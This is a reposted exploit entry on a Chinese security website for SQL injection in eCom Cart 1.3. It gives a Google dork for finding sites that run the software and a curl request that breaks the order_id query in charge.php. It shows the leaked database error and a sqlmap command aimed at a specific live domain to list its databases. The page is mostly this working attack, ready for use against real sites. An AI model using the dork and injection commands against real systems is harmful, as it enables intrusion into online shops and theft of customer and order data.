标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-76]   作者: ecawen 发表于: [2017-07-17]

本文共 [560] 位读者顶过

[出自:jiwo.org] # Exploit Title: eCom Cart 1.3 Exploit
# Google Dork: inurl:"/pdetails/11" ([11] is variable)
# Date: 10.06.2017
# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
# Version: 1.3
# Tested on: Linux
 
 
 
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
 
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation: 1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1 in
/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:
#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')
#1 {main}
  thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16
 
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs

评论

暂无
发表评论
 返回顶部 
热度(560)
 关注微信